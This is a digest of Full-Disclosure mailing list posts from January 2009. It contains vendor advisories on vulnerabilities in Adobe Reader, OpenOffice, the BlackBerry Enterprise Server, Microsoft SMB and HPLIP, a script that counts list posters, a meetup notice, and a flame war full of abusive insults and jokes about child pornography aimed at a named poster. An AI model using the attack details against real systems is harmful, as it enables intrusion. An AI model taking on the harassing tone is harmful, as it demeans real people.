Re: [Full-disclosure] mr wallace must be stopped and i know how
i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community

On Tue, 13 Jan 2009 01:17:03 -0500 Jubei Trippataka vpn.1.fana...@gmail.com wrote:
> Anyone that can cop that much abuse and prosper has to be extremely sadomasochistic. The delusion that a blogger such as Mr Wallace somehow contributes to the security community is hilarious at first and when the comical side clears you have that pathetic little failed abortion asking why he's the target of abuse. To be honest, I'd rather have my children babysat by Josef Fritzel than take security advice from this schizo.
>
> --
> ciao
> JT

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mr wallace must be stopped and i know how
That would be child pornography...

On Tue, Jan 13, 2009 at 11:44 AM, sexyazngr...@mac.hush.com wrote:
> i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community
>
> On Tue, 13 Jan 2009 01:17:03 -0500 Jubei Trippataka vpn.1.fana...@gmail.com wrote:
> > Anyone that can cop that much abuse and prosper has to be extremely sadomasochistic. The delusion that a blogger such as Mr Wallace somehow contributes to the security community is hilarious at first and when the comical side clears you have that pathetic little failed abortion asking why he's the target of abuse. To be honest, I'd rather have my children babysat by Josef Fritzel than take security advice from this schizo.
> >
> > --
> > ciao
> > JT
Re: [Full-disclosure] mr wallace must be stopped and i know how
maybe you could have impressed somebody with that offer 30 years ago. Today with all the great looking pornstars on the net it is probably a great relief we don't have to look at your nude pictures.

On 13.01.2009, at 10:44, sexyazngr...@mac.hush.com wrote:
> i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community
Re: [Full-disclosure] mr wallace must be stopped and i know how
I am quite sure even 30 years ago there were laws against child pornography - but then again, 30 years ago I doubt even his parents were born.

On Tue, Jan 13, 2009 at 1:44 PM, Peter Bruderer peter.brude...@brg.ch wrote:
> maybe you could have impressed somebody with that offer 30 years ago. Today with all the great looking pornstars on the net it is probably a great relief we don't have to look at your nude pictures.
>
> On 13.01.2009, at 10:44, sexyazngr...@mac.hush.com wrote:
> > i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community
[Full-disclosure] [ GLSA 200901-09 ] Adobe Reader: User-assisted execution of arbitrary code
Gentoo Linux Security Advisory                           GLSA 200901-09
http://security.gentoo.org/

Severity: Normal
Title: Adobe Reader: User-assisted execution of arbitrary code
Date: January 13, 2009
Bugs: #225483
ID: 200901-09

Synopsis
========

Adobe Reader is vulnerable to execution of arbitrary code.

Background
==========

Adobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader.

Affected packages
=================

     Package            /  Vulnerable  /  Unaffected
  1  app-text/acroread     < 8.1.3        >= 8.1.3

Description
===========

* An unspecified vulnerability can be triggered by a malformed PDF document, as demonstrated by 2008-HI2.pdf (CVE-2008-2549).
* Peter Vreugdenhil, Dyon Balding, Will Dormann, Damian Frizza, and Greg MacManus reported a stack-based buffer overflow in the util.printf JavaScript function that incorrectly handles the format string argument (CVE-2008-2992).
* Greg MacManus of iDefense Labs reported an array index error that can be leveraged for an out-of-bounds write, related to parsing of Type 1 fonts (CVE-2008-4812).
* Javier Vicente Vallejo and Peter Vreugdenhil, via Zero Day Initiative, reported multiple unspecified memory corruption vulnerabilities (CVE-2008-4813).
* Thomas Garnier of SkyRecon Systems reported an unspecified vulnerability in a JavaScript method, related to an input validation issue (CVE-2008-4814).
* Josh Bressers of Red Hat reported an untrusted search path vulnerability (CVE-2008-4815).
* Peter Vreugdenhil reported through iDefense that the Download Manager can trigger a heap corruption via calls to the AcroJS function (CVE-2008-4817).

Impact
======

A remote attacker could entice a user to open a specially crafted PDF document, and local attackers could entice a user to run acroread from an untrusted working directory. Both might result in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Reader users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/acroread-8.1.3"

References
==========

[ 1 ] CVE-2008-2549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2549
[ 2 ] CVE-2008-2992 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992
[ 3 ] CVE-2008-4812 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4812
[ 4 ] CVE-2008-4813 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4813
[ 5 ] CVE-2008-4814 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4814
[ 6 ] CVE-2008-4815 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4815
[ 7 ] CVE-2008-4817 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4817

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200901-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Re: [Full-disclosure] Simple request
FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet.

Some numbers of 2008:
Oct '08: 531
Mar '08: 600
Jan '08: 615

Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything...

Juha-Matti
Re: [Full-disclosure] Simple request
Can you tell us what percentage of those were spam from n3tty and his ilk? I would do it myself, but I have him directed straight to the delete folder

2009/1/13 Juha-Matti Laurio juha-matti.lau...@netti.fi
> FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet.
>
> Some numbers of 2008:
> Oct '08: 531
> Mar '08: 600
> Jan '08: 615
>
> Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything...
>
> Juha-Matti
Re: [Full-disclosure] Simple request
I have not counted percentages but let's check this archive view
http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html
and it's possible to run a script to
http://lists.grok.org.uk/pipermail/full-disclosure/2009-January.txt
etc.

Juha-Matti

James Rankin [kz2...@googlemail.com] wrote:
> Can you tell us what percentage of those were spam from n3tty and his ilk? I would do it myself, but I have him directed straight to the delete folder
>
> 2009/1/13 Juha-Matti Laurio juha-matti.lau...@netti.fi
> > FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet.
> >
> > Some numbers of 2008:
> > Oct '08: 531
> > Mar '08: 600
> > Jan '08: 615
> >
> > Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything...
Re: [Full-disclosure] mr wallace must be stopped and i know how
On Tue, 13 Jan 2009 11:54:25 +0200, Avraham Schneider said:
> That would be child pornography...

The statutes in most places specify *calendar* age, not intellectual age.
Re: [Full-disclosure] Simple request
On Tue, Jan 13, 2009 at 1:24 PM, Juha-Matti Laurio juha-matti.lau...@netti.fi wrote:
> Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything...

They disclosed their hatred towards *someone*, that personality of hatred is unlikely to end so plenty was disclosed that law enforcement and counter-terrorism officials will find useful. Their hatred is unlikely to be exclusive to 'n3td3v' and will be carried off into the offline communities where they live.

Keep your friends close and your enemies closer.

Andrew
[Full-disclosure] [ MDVSA-2009:006 ] openoffice.org
Mandriva Linux Security Advisory                         MDVSA-2009:006
http://www.mandriva.com/security/

Package : openoffice.org
Date: January 13, 2009
Affected: 2008.0, 2008.1

Problem Description:

Heap-based overflow on functions to manipulate WMF and EMF files in OpenOffice.org documents enables remote attackers to execute arbitrary code on documents holding certain crafted either WMF or EMF files (CVE-2008-2237) (CVE-2008-2238).

This update provides the fix for these security issues and further openoffice.org-voikko package has been updated as it depends on openoffice.org packages.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238

Updated Packages:
Re: [Full-disclosure] mr wallace must be stopped and i know how
What makes you believe that there is any criteria that qualifies him as an adult?

On Tue, Jan 13, 2009 at 6:13 PM, valdis.kletni...@vt.edu wrote:
> On Tue, 13 Jan 2009 11:54:25 +0200, Avraham Schneider said:
> > That would be child pornography...
>
> The statutes in most places specify *calendar* age, not intellectual age.
[Full-disclosure] Full Disclosure Top List
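The top list of people posting to fd (although people like n3td3v have several aliases and are listed several times).

.----------------------------------------------------.
| Top List For: January_2009                         |
+---------+-----------+------------------------------+
|   nr.   |   posts.  |  user.                       |
+---------+-----------+------------------------------+
|   1     |   88      |  n3td3v,andrew.wallace,sexyazngrl69
|   2     |   41      |  Ureleet                     |
|   3     |   39      |  Avraham_Schneider           |
|   4     |   34      |  j-f_sentier                 |
|   5     |   19      |  Valdis.Kletnieks_at_vt.edu  |
|   6     |   17      |  Biz_Marqee                  |
|   7     |   14      |  Paul_Schmehl                |
|   8     |   11      |  Mainbox_Notif               |
|   9     |   11      |  James_Matthews              |
|   10    |   10      |  Ed_Carp                     |
'----------------------------------------------------'

.----------------------------------------------------.
| Top List For: December_2008                        |
+---------+-----------+------------------------------+
|   nr.   |   posts.  |  user.                       |
+---------+-----------+------------------------------+
|   1     |   78      |  Ureleet                     |
|   2     |   76      |  n3td3v                      |
|   3     |   26      |  Valdis.Kletnieks_at_vt.edu  |
|   4     |   25      |  James_Matthews              |
|   5     |   22      |  j-f_sentier                 |
|   6     |   17      |  Elazar_Broad                |
|   7     |   15      |  Bipin_Gautam                |
|   8     |   12      |  zdi-disclosures_at_3com.com |
|   9     |   12      |  security_at_mandriva.com    |
|   10    |   12      |  Mike_C                      |
'----------------------------------------------------'

.----------------------------------------------------.
| Top List For: November_2008                        |
+---------+-----------+------------------------------+
|   nr.   |   posts.  |  user.                       |
+---------+-----------+------------------------------+
|   1     |   112     |  n3td3v                      |
|   2     |   61      |  Ureleet                     |
|   3     |   35      |  Valdis.Kletnieks_at_vt.edu  |
|   4     |   30      |  adrian.lamo_at_hushmail.com |
|   5     |   22      |  James_Matthews              |
|   6     |   21      |  Trollie_Fingers             |
|   7     |   18      |  Mike_C                      |
|   8     |   15      |  vulcanius                   |
|   9     |   15      |  security_at_mandriva.com    |
|   10    |   14      |  Fredrick_Diggle             |
'----------------------------------------------------'

I believe that n3td3v is trying to destroy this list so that his history here somehow magically disappears, this will not happen of course because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity.

## In case someone else wants to use this script: ##

#!/bin/bash
# Number of posters to list for each month.
LIST_SIZE=13

# _get URL LABEL: download one pipermail author index and print its top posters.
# The border dashes and the spaces inside the quoted strings were collapsed in
# the archived copy; they are restored here to match the padding arithmetic.
function _get() {
    MONTH="$2.txt"
    URL="$1"
    wget "$URL" -O "$MONTH" 1>/dev/null 2>/dev/null

    # ignore if name contains quotations etc.
    echo ".----------------------------------------------------."
    echo -n "| Top List For: $2"
    let S=37-$(echo "$2" | wc -c)
    for space in $(seq 0 $S); do echo -n " "; done
    echo "|"
    echo "+---------+-----------+------------------------------+"
    echo "|   nr.   |   posts.  |  user.                       |"
    echo "+---------+-----------+------------------------------+"

    # Count posts per author. The grep pattern is missing from the archived
    # copy; '<I>' is assumed here, the three-character tag that precedes each
    # author name in the index and that the first sed expression strips.
    PRE=$(grep '<I>' "$MONTH" | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c |
          sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g')

    COUNT=1
    # One "posts name" pair per line. The archived copy joins and re-splits the
    # pair on the letter 'y', which breaks every name containing that letter.
    while read -r POSTS NAME; do
        declare -a ITEMS=("$POSTS" "$NAME")
        # format nr col
        echo -n "|   $COUNT"
        let S=6-$(echo $COUNT | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        # format posts. col.
        echo -n "|   ${ITEMS[0]}"
        let S=8-$(echo ${ITEMS[0]} | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        echo -n "|  "
        # format user col. (cut long names to the column width before printing)
        if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then
            ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g')
        fi
        echo -n "${ITEMS[1]}"
        let S=28-$(echo ${ITEMS[1]} | wc -c)
        for space in $(seq 0 $S); do echo -n " "; done
        echo "|"
        let COUNT=$COUNT+1
    done <<< "$PRE"
    echo "'----------------------------------------------------'"
}

_get "http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html" "January_2009"
echo; echo
# _get   (the rest of the script is cut off in the archived message)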
[Full-disclosure] ANNOUNCE: DEFCON London - DC4420 - January meet - Thursday 15th Jan 2009
hi all!

here is an announcement, shamelessly cut pasted from the website (i.e. alien wrote it really :)

Thursday 15th January.

Happy seasonal greetings and stuff. The new year rolls in, the Govt 'crazy ideas' talking starts again - however here - sanity reigns and thus we bring you:

Trampoliner - Automatically choosing return addresses for buffer overflow attacks - Tom Keetch
MUFFIN recipe: How to find software vulnerabilities on Microsoft OS demo of firewire data leakage - Guillaume Vissian
Architecture Analysis. - Orac
failed allocations, more interesting than pie - xz

All welcome, and if it's your first time you will be talking. Make it a new year resolution to talk to someone you don't know at this meeting!

mailing list - login and look at the projects forum for details. the list will only accept posts from subscriber addresses! so if you send something and it doesn't appear, that's why...

Where?

Upstairs @ Glassblower
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr
42 Glasshouse St, Piccadilly, W1B 5JY

doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London.

we have private use of the whole of the upstairs till 11.30.

real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'.
other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe.
even more stuff on draught : Becks, Fosters, 1664

food menu is extensive and most importantly : they do Pie - but they stop serving at 9pm!

comment/participate at http://dc4420.org/

see you there!!!

cheers,
MM
--
In DEFCON, we have no names... errr... well, we do... but silly ones...
Re: [Full-disclosure] Full Disclosure Top List
On Tue, Jan 13, 2009 at 6:32 PM, Fd Top List fdtopl...@live.se wrote:
> n3td3v have several aliases and are listed several times.

Mine have only ever been:

n3td3v
xploitable
hackthegov
worriedsecurity

> sexyazngrl69

Nothing to do with me.

> I believe that n3td3v is trying to destroy this list

I'm not trying to destroy anything, I'm a good guy trying to counter the threats like many of us are trying to do.

Please don't get a job in security or intelligence if that's your genuine conclusion.
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller 'symWidths' Heap Overflow Vulnerability
iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, usually SYSTEM.

The vulnerability occurs when parsing a certain stream inside of a PDF file. During parsing, a heap buffer is filled up without properly checking to see whether the buffer is large enough to hold the current value. By inserting a large number of values, it is possible to overflow the buffer, and corrupt object pointers. This can lead to pointers being controlled, which results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must email an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device.

It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary.

Exploitation of heap overflow vulnerabilities on modern operating systems can be difficult due to heap integrity checks. However, the code in the PDF Distiller offers a wide variety of application specific targets for overwriting. By sculpting the heap it is possible to place pointers in the buffer and use these to gain arbitrary code execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows:

To remove the PDF file extension from the list of supported file format extensions, complete the following actions:

1. From the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions.
4. Click Apply.
5. Click OK.

After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps:

1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Configuration Option drop-down list, select Attachment Server.
4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column.
5. Click Apply.
6. Click OK.
7. On the Windows Desktop, in Administrative Tools, open Services.
8. Right-click BlackBerry Attachment Service and click Stop.
9. Right-click BlackBerry Attachment Service and click Start.
10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps:

1. On the Windows Desktop, in Administrative Tools, open Services.
2. Right-click BlackBerry Dispatcher and click Stop.
3. Right-click BlackBerry Dispatcher and click Start.
4. Close Services.

In IBM Lotus Domino environments, complete the following additional steps:

1. Open the IBM Lotus Domino Administrator.
2. Click the Server
[Full-disclosure] ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution Vulnerability
ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-002
January 13, 2009

-- CVE ID:
CVE-2008-4835

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2003
Microsoft Windows XP
Microsoft Windows 2000 SP4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6662. For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to trigger a denial of service condition on vulnerable installations of Microsoft Windows; remote code execution is also theoretically possible. User interaction is not required to exploit this vulnerability.

The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans2 request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx

-- Disclosure Timeline:
2008-08-14 - Vulnerability reported to vendor
2009-01-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/
[Full-disclosure] ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution Vulnerability
ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-001 January 13, 2009 -- CVE ID: CVE-2008-4834 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows XP Microsoft Windows 2000 SP4 Microsoft Windows Server 2003 Microsoft Windows Vista Microsoft Windows Server 2008 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6662. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to trigger a denial of service condition on vulnerable installations of Microsoft Windows; remote code execution is also theoretically possible. User interaction is not required to exploit this vulnerability. The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx -- Disclosure Timeline: 2008-06-25 - Vulnerability reported to vendor 2009-01-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. 
[Full-disclosure] [USN-708-1] HPLIP vulnerability
===
Ubuntu Security Notice USN-708-1 January 13, 2009
hplip vulnerability
https://launchpad.net/bugs/191299
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 7.10:
  hplip 2.7.7.dfsg.1-0ubuntu5.3

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that an installation script in the HPLIP package would change permissions on the hplip config files located in users' home directories. A local user could exploit this and change permissions on arbitrary files upon an HPLIP installation or upgrade, which could lead to root privileges.

Updated packages for Ubuntu 7.10: source archives, architecture independent packages, and packages for the amd64, i386, lpia, powerpc and sparc architectures.
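The advisory does not say how the permission change is redirected. The added example below (not code from the HPLIP package or from the Ubuntu fix) assumes the usual mechanism for this bug class, a symbolic link planted where a privileged script expects a per-user config file, and puts the path-based call beside a descriptor-based one; all function names, file names and the scratch directory are hypothetical.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Unsafe pattern: chmod() resolves symbolic links, so a privileged caller
 * changes the mode of whatever the user-controlled path points at. */
int naive_set_mode(const char *path, mode_t mode)
{
    return chmod(path, mode);
}

/* Hardened pattern (hypothetical helper): open without following a final
 * symlink, validate the object behind the descriptor, then fchmod() that
 * same descriptor so the checked file and the changed file cannot differ.
 * O_NOFOLLOW covers only the last path component; a privileged installer
 * should also drop to the user's uid before touching the home directory. */
int safe_set_mode(const char *path, uid_t expected_owner, mode_t mode)
{
    struct stat st;
    int rc;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);

    if (fd < 0)
        return -1;                        /* ELOOP if path is a symlink */
    if (fstat(fd, &st) != 0 ||
        !S_ISREG(st.st_mode) ||           /* no directories, FIFOs, devices */
        st.st_uid != expected_owner ||    /* must belong to that user */
        st.st_nlink != 1) {               /* no hard link to another file */
        close(fd);
        errno = EPERM;
        return -1;
    }
    rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

static int create_file(const char *path)
{
    int fd = open(path, O_CREAT | O_WRONLY | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    close(fd);
    return chmod(path, 0600);             /* fixed mode regardless of umask */
}

static mode_t mode_of(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (st.st_mode & 07777) : (mode_t)-1;
}

/* Constructed scenario in a scratch directory. Returns the number of checks
 * that did not behave as described (0 means all passed), or -1 on setup error. */
int run_demo(void)
{
    char dir[] = "/tmp/perm-demo-XXXXXX";
    char conf[64], victim[64], link_path[64];
    int failures = 0;

    if (!mkdtemp(dir))
        return -1;
    snprintf(conf, sizeof conf, "%s/demo.conf", dir);       /* real config */
    snprintf(victim, sizeof victim, "%s/victim", dir);      /* unrelated file */
    snprintf(link_path, sizeof link_path, "%s/link.conf", dir);
    if (create_file(conf) || create_file(victim) || symlink(victim, link_path))
        return -1;

    /* Hardened call refuses the symlink and leaves its target untouched. */
    if (safe_set_mode(link_path, getuid(), 0666) == 0) failures++;
    if (mode_of(victim) != 0600) failures++;
    /* Hardened call works on the genuine regular file. */
    if (safe_set_mode(conf, getuid(), 0644) != 0) failures++;
    if (mode_of(conf) != 0644) failures++;
    /* A file owned by someone other than the expected user is refused. */
    if (safe_set_mode(conf, getuid() + 1, 0600) == 0) failures++;
    /* Path-based call follows the link and changes the unrelated file. */
    if (naive_set_mode(link_path, 0640) != 0) failures++;
    if (mode_of(victim) != 0640) failures++;

    unlink(link_path);
    unlink(victim);
    unlink(conf);
    rmdir(dir);
    return failures;
}

int main(void)
{
    int failures = run_demo();
    printf("checks failed: %d\n", failures);
    return failures != 0;
}
```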
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller 'bitmaps' Heap Overflow Vulnerability
iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF file. During parsing, a dynamic array is filled up with pointers to certain objects without properly checking to see whether the array is large enough to hold all of the pointers. By inserting a large number of pointers, it is possible to overflow the array, and corrupt object pointers. This can lead to the EIP register being controlled, which results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must e-mail an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device.

It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary.

In Labs testing, it was possible to gain code execution, albeit unreliably. It is likely that with additional heap sculpting reliable code execution is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows:

To remove the PDF file extension from the list of supported file format extensions, complete the following actions:

1. From the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions.
4. Click Apply.
5. Click OK.

After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps:

1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
2. Click the Attachment Server tab.
3. In the Configuration Option drop-down list, select Attachment Server.
4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column.
5. Click Apply.
6. Click OK.
7. On the Windows Desktop, in Administrative Tools, open Services.
8. Right-click BlackBerry Attachment Service and click Stop.
9. Right-click BlackBerry Attachment Service and click Start.
10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps:

1. On the Windows Desktop, in Administrative Tools, open Services.
2. Right-click BlackBerry Dispatcher and click Stop.
3. Right-click BlackBerry Dispatcher and click Start.
4. Close Services.

In IBM Lotus Domino environments, complete the following additional steps:

1. Open the IBM Lotus Domino Administrator.
2. Click the Server tab.
3. Click the Status tab.
4. Click Server Console.
5. In the Domino Command field, type tell BES quit and press ENTER.
6. In the
Re: [Full-disclosure] Full Disclosure Top List
as i said. im done posting about him, so i apologize to those ive inadvertently pissed off in the wake of flushing him down the toilet.

On Tue, Jan 13, 2009 at 1:32 PM, Fd Top List fdtopl...@live.se wrote:

The top list of people posting to fd (although people like n3td3v have several aliases and are listed several times).

| Top List For: January_2009                        |
+-----+--------+------------------------------------+
| nr. | posts. | user.                              |
+-----+--------+------------------------------------+
| 1   | 88     | n3td3v,andrew.wallace,sexyazngrl69 |
| 2   | 41     | Ureleet                            |
| 3   | 39     | Avraham_Schneider                  |
| 4   | 34     | j-f_sentier                        |
